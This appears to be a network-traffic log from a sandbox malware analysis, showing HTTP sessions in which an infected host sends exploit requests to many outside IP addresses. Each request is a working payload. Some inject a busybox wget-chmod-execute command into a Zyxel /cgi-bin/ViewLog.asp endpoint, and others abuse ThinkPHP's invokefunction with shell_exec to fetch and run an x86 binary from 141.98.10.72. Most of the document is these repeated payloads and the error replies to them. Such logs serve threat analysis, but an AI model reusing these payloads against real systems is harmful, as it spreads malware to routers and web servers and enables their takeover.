                                                        382192.168.2.144512895.183.53.478080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.534020901 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:42.743146896 CET96INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:17 GMT
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        383192.168.2.145309685.93.55.728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.593169928 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        384192.168.2.145382694.121.34.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.595153093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        385192.168.2.146032494.122.238.2538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.595288038 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        386192.168.2.143335294.123.73.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:42.598947048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        387192.168.2.1455420112.45.115.19280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.058923006 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:43.434163094 CET482INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 249
                                                        Connection: close
                                                        Via: cache13.cn1316[,0]
                                                        Timing-Allow-Origin: *
                                                        EagleId: 0000000017078996232482942e
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        388192.168.2.1455424112.45.115.19280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.059015989 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:43.435924053 CET482INHTTP/1.1 400 Bad Request
                                                        Server: Tengine
                                                        Date: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 249
                                                        Connection: close
                                                        Via: cache19.cn1316[,0]
                                                        Timing-Allow-Origin: *
                                                        EagleId: 0000000017078996232492809e
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        389192.168.2.143780495.209.135.1838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.068809986 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:45.447424889 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        390192.168.2.1456074112.17.45.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.085500956 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        391192.168.2.145311685.93.55.728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.097711086 CET268INHTTP/1.0 400 Bad Request
                                                        Server: httpd
                                                        Date: Wed, 14 Feb 2024 12:35:34 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        392192.168.2.145722288.221.98.3180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.261075020 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:43.463320017 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 31 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 36 32 33 26 23 34 36 3b 32 30 37 63 33 63 63 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;91341060&#46;1707899623&#46;207c3cc2</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        393192.168.2.143338431.136.123.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.333353996 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:46.471446037 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:52.615148067 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:04.646596909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.965600014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:18.115622997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        394192.168.2.144052885.14.66.2118080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.551976919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.772120953 CET30INHTTP/1.1 404 Can't find file


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        395192.168.2.143633694.121.155.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.581088066 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        396192.168.2.144247694.187.104.1198080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.589832067 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        397192.168.2.144347488.151.121.980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.644989014 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        398192.168.2.144602288.198.146.16480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.646411896 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:43.857356071 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx-rc
                                                        Date: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2d 72 63 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx-rc/1.21.4.1</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        399192.168.2.144298888.2.238.12780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.661938906 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:43.890341997 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:43 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        400192.168.2.144057888.135.46.16280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:43.724351883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:44.014080048 CET115INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close
                                                        Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                        Data Ascii: 400 Bad Request


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        401192.168.2.1454448112.29.214.2880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:45.369685888 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
